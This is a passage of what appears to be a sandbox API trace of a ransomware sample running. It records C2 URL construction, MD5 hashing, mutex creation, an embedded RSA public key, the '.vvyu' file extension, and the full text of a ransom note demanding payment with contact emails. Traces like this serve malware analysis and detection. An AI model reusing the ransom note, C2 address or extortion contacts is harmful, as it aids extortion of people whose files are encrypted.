0x2c789a0 [0178.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c7d768, cbMultiByte=-1, lpWideCharStr=0x2c789a0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.674] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.675] lstrlenA (lpString="") returned 0 [0178.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x2c78980 [0178.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c7d9d0, cbMultiByte=-1, lpWideCharStr=0x2c78980, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.675] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.675] lstrlenA (lpString="") returned 0 [0178.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x2c789b0 [0178.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c7dc38, cbMultiByte=-1, lpWideCharStr=0x2c789b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.675] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.675] lstrlenW (lpString="") returned 0 [0178.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12) returned 0x646368 [0178.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x288) returned 0x2d03040 [0178.675] GetAdaptersInfo (in: AdapterInfo=0x2d03040, SizePointer=0x18ea04 | out: AdapterInfo=0x2d03040, SizePointer=0x18ea04) returned 0x0 [0178.736] GetAdaptersInfo (in: AdapterInfo=0x2d03040, SizePointer=0x18ea04 | out: AdapterInfo=0x2d03040, SizePointer=0x18ea04) returned 0x0 [0178.767] GetLastError () returned 0x0 [0178.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x2d0b3c0 [0178.879] GetLastError () returned 0x0 [0180.958] GetLastError () returned 0x0 [0180.960] CryptAcquireContextW (in: phProv=0x18e9d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e9d4*=0x67c168) returned 1 [0180.962] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e9dc | out: phHash=0x18e9dc) returned 1 [0180.962] CryptHashData (hHash=0x64f9d0, pbData=0x2c94528, dwDataLen=0x11, dwFlags=0x0) returned 1 [0180.962] CryptGetHashParam (in: hHash=0x64f9d0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e9d8) returned 1 [0180.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x646388 [0180.962] CryptGetHashParam (in: hHash=0x64f9d0, dwParam=0x2, pbData=0x646388, pdwDataLen=0x18e9d8, dwFlags=0x0 | out: pbData=0x646388, pdwDataLen=0x18e9d8) returned 1 [0180.962] GetLastError () returned 0x0 [0180.962] CryptDestroyHash (hHash=0x64f9d0) returned 1 [0180.962] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0180.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94528 | out: hHeap=0x620000) returned 1 [0180.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9258 [0180.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669238 | out: hHeap=0x620000) returned 1 [0180.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x654b28 | out: hHeap=0x620000) returned 1 [0180.962] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x3b8) returned 0x4fc [0181.232] WaitForSingleObject (hHandle=0x4fc, dwMilliseconds=0xffffffff) returned 0x0 [0182.150] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x500 [0182.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x64a510 [0182.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7dea0 [0182.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7e108 [0182.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7e370 [0182.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7e5d8 [0182.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7e840 [0182.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7eaa8 [0182.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7ed10 [0182.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7ef78 [0182.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7f1e0 [0182.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7f448 [0182.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e0) returned 0x6756a8 [0182.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5ec) returned 0x2d0cde8 [0182.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2d0cde8, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0182.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5f0) returned 0x2d0d3e0 [0182.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0cde8 | out: hHeap=0x620000) returned 1 [0182.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6756a8 | out: hHeap=0x620000) returned 1 [0182.166] CryptAcquireContextW (in: phProv=0x18ea44, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ea44*=0x67c168) returned 1 [0182.168] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18ea48 | out: phHash=0x18ea48) returned 1 [0182.168] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0182.168] CryptHashData (hHash=0x2cfe080, pbData=0x2d0d3e0, dwDataLen=0x1ec, dwFlags=0x0) returned 1 [0182.168] CryptGetHashParam (in: hHash=0x2cfe080, dwParam=0x2, pbData=0x0, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ea4c) returned 1 [0182.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x6465c8 [0182.168] CryptGetHashParam (in: hHash=0x2cfe080, dwParam=0x2, pbData=0x6465c8, pdwDataLen=0x18ea4c, dwFlags=0x0 | out: pbData=0x6465c8, pdwDataLen=0x18ea4c) returned 1 [0182.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x34) returned 0x2cfe040 [0182.168] GetLastError () returned 0x0 [0182.168] lstrcatA (in: lpString1="", lpString2="B0" | out: lpString1="B0") returned="B0" [0182.168] GetLastError () returned 0x0 [0182.168] lstrcatA (in: lpString1="B0", lpString2="2C" | out: lpString1="B02C") returned="B02C" [0182.168] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C", lpString2="80" | out: lpString1="B02C80") returned="B02C80" [0182.169] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C80", lpString2="DC" | out: lpString1="B02C80DC") returned="B02C80DC" [0182.169] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C80DC", lpString2="8F" | out: lpString1="B02C80DC8F") returned="B02C80DC8F" [0182.169] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C80DC8F", lpString2="EB" | out: lpString1="B02C80DC8FEB") returned="B02C80DC8FEB" [0182.169] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C80DC8FEB", lpString2="F5" | out: lpString1="B02C80DC8FEBF5") returned="B02C80DC8FEBF5" [0182.169] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C80DC8FEBF5", lpString2="87" | out: lpString1="B02C80DC8FEBF587") returned="B02C80DC8FEBF587" [0182.169] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C80DC8FEBF587", lpString2="A0" | out: lpString1="B02C80DC8FEBF587A0") returned="B02C80DC8FEBF587A0" [0182.169] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C80DC8FEBF587A0", lpString2="F6" | out: lpString1="B02C80DC8FEBF587A0F6") returned="B02C80DC8FEBF587A0F6" [0182.169] GetLastError () returned 0x0 [0182.169] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F6", lpString2="2E" | out: lpString1="B02C80DC8FEBF587A0F62E") returned="B02C80DC8FEBF587A0F62E" [0182.169] GetLastError () returned 0x0 [0182.170] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E", lpString2="01" | out: lpString1="B02C80DC8FEBF587A0F62E01") returned="B02C80DC8FEBF587A0F62E01" [0182.170] GetLastError () returned 0x0 [0182.170] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DA") returned="B02C80DC8FEBF587A0F62E01DA" [0182.170] GetLastError () returned 0x0 [0182.170] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DA", lpString2="DA" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA") returned="B02C80DC8FEBF587A0F62E01DADA" [0182.170] GetLastError () returned 0x0 [0182.170] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA", lpString2="40" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40") returned="B02C80DC8FEBF587A0F62E01DADA40" [0182.170] GetLastError () returned 0x0 [0182.170] lstrcatA (in: lpString1="B02C80DC8FEBF587A0F62E01DADA40", lpString2="CE" | out: lpString1="B02C80DC8FEBF587A0F62E01DADA40CE") returned="B02C80DC8FEBF587A0F62E01DADA40CE" [0182.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6465c8 | out: hHeap=0x620000) returned 1 [0182.170] CryptDestroyHash (hHash=0x2cfe080) returned 1 [0182.170] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0182.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d3e0 | out: hHeap=0x620000) returned 1 [0182.171] lstrlenA (lpString="B02C80DC8FEBF587A0F62E01DADA40CE") returned 32 [0182.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e0) returned 0x6756a8 [0182.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5ec) returned 0x2d0cde8 [0182.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x2d0cde8, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0182.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5f0) returned 0x2d0d3e0 [0182.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0cde8 | out: hHeap=0x620000) returned 1 [0182.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6756a8 | out: hHeap=0x620000) returned 1 [0182.171] lstrcpyA (in: lpString1=0x2d00010, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0182.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d3e0 | out: hHeap=0x620000) returned 1 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb43e8 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x2cff150 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7f6b0 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7f918 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7fb80 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7fde8 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c80050 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c802b8 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c80520 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c80788 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c809f0 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c80c58 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x816) returned 0x2d0cde8 [0182.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d0cde8, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0182.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2d0d608 [0182.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0cde8 | out: hHeap=0x620000) returned 1 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x2cff000 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8e8c8 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8eb30 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8ed98 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8f000 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8f268 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8f4d0 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8f738 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8f9a0 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8fc08 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c8fe70 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0182.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x130) returned 0x655b18 [0182.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0182.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1d0) returned 0x678140 [0182.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x655b18 | out: hHeap=0x620000) returned 1 [0182.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2b7) returned 0x6756a8 [0182.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x678140 | out: hHeap=0x620000) returned 1 [0182.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x412) returned 0x2d0c3c8 [0182.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6756a8 | out: hHeap=0x620000) returned 1 [0182.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x61a) returned 0x2d0cde8 [0182.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0182.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x440) returned 0x2d0c3c8 [0182.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1068) returned 0x2d0de30 [0182.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2d0c3c8, cbMultiByte=-1, lpWideCharStr=0x2d0de30, cchWideChar=2100 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned 1077 [0182.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1070) returned 0x2d0eea0 [0182.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0de30 | out: hHeap=0x620000) returned 1 [0182.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x2cff1e0 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c900d8 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c90340 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c905a8 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c90810 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c90a78 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c90ce0 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c90f48 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c911b0 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c91418 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c91680 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80a) returned 0x2d0de30 [0182.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d0de30, cchWideChar=1029 | out: lpWideCharStr=".vvyu") returned 6 [0182.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2d0e648 [0182.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0de30 | out: hHeap=0x620000) returned 1 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6597a8 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x646348 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x669238 [0182.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646348 | out: hHeap=0x620000) returned 1 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb44b8 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x48) returned 0x2ccbb98 [0182.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669238 | out: hHeap=0x620000) returned 1 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdd7e0 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4520 [0182.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccbb98 | out: hHeap=0x620000) returned 1 [0182.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0182.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x69cdc8 [0182.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4520 | out: hHeap=0x620000) returned 1 [0182.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaad8 [0182.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdd828 [0182.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd8) returned 0x6e2c38 [0182.178] HeapFree 